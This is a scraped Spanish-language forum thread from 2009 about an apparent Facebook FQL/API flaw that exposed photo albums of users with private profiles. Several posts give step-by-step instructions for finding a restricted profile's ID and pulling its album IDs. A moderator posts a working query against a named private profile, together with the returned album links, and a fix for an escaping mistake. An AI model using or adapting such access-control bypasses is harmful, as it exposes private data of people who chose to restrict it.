 Autor
|
Tema: FQL Injection (?) (Leído 50,354 veces)
|
Littlehorse
All the world's a stage
Colaborador
 Desconectado
Mensajes: 2.714
Nie Dam Sie
|
Claro, yo llego a lo mismo pero en Español XD
|
|
|
|
|
En línea
|
An expert is a man who has made all the mistakes which can be made, in a very narrow field.
|
|
|
Krackwar ™
Desconectado
Mensajes: 100
|
Lo abran arreglado.
|
|
|
|
|
En línea
|
WHK es mas u17r4m4573r31337 que yo  El error mas grande de el mundo es decir que el ser humano es inteligente. Facismo , antifacismo , etc.. la misma mie rda .. Soy el-> http://tinyurl.com/fantasma-de-krackwarmov ecx,1000 Etiqueta: invoke printf,"No Copiare en clases" loop Etiq
|
|
|
Littlehorse
All the world's a stage
Colaborador
Desconectado
Mensajes: 2.714
Nie Dam Sie
|
No, si funciona, lo acabo de probar  Saludos
|
|
|
|
|
En línea
|
An expert is a man who has made all the mistakes which can be made, in a very narrow field.
|
|
|
|
|
|
toxeek
|
Que tal.
A ver.. yo uso el Method photos.getAlbums.
Tras ello, en el callback pongo lo citado.
Pero este "bug" deberia de servir para aquellas personas que no son tus amigos, y tienen restricciones puestas para ver su album/perfil.
Mucho me temo que se este probando con personas con el perfil abierto.
Como digo, yo haciendolo asi recibo esa pagina de error..
Saludos.
|
|
|
|
|
En línea
|
"La envidia es una declaración de inferioridad"
Napoleón.
|
|
|
|
|
|
toxeek
|
Que tal.
A ver, los que dicen que pueden, pueden hacer algo?
Busquen entre los amigos de sus amigos alguien que no tenga el hypervinculo activado en su nombre ( esto denotara que tiene impuestas restricciones para ver su perfil, y estos son los INTERESANTES ).
Tras ello pues hagan SOLO un click en su foto, y posen el puntero del raton sobre el link como para mandarles un mensaje.
Con el puntero posado, en la parte inferior ( informativa de links ) del Browser podremos obtener su ID.
Bien, tras ello hacemos todo el proceso con la API como se ha citado, para hacernos con el aid.
Pueden ver el album de esa persona??
Suerte.
|
|
|
|
|
En línea
|
"La envidia es una declaración de inferioridad"
Napoleón.
|
|
|
EvilGoblin
Desconectado
Mensajes: 2.323
YO NO LA VOTE!
|
Sip ... verdaderamente bueno ^_^ pero veo muchas opciones.. quizas tenga otras cosas para jugar =D
^^
|
|
|
|
|
En línea
|
Experimental Serial Lain [Linux User]
|
|
|
sirdarckcat
Aspirante a supervillano
Moderador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
Miren, otro ejemplo: http://www.facebook.com/profile.php?id=4 (el creador de facebook, perfil privado) SELECT link FROM album WHERE owner=4
<?xml version="1.0" encoding="UTF-8"?> <fql_query_response xmlns="http://api.facebook.com/1.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" list="true"> <album> <link>http://www.facebook.com/album.php?aid=2204760&id=4</link> </album> <album> <link>http://www.facebook.com/album.php?aid=2047231&id=4</link> </album> <album> <link>http://www.facebook.com/album.php?aid=2034080&id=4</link> </album> <album> <link>http://www.facebook.com/album.php?aid=2002684&id=4</link> </album> </fql_query_response>
Funciona   Saludos!! |
|
|
|
« Última modificación: 16 Marzo 2009, 00:11 am por sirdarckcat »
|
En línea
|
|
|
|
sirdarckcat
Aspirante a supervillano
Moderador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
Ahhh ya vi su error XDDD
Estaban poniendo & en el link jajaja.. deben cambiar & por &, porque XML convierte chars como & a su entidad en HTML.
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
|
 |
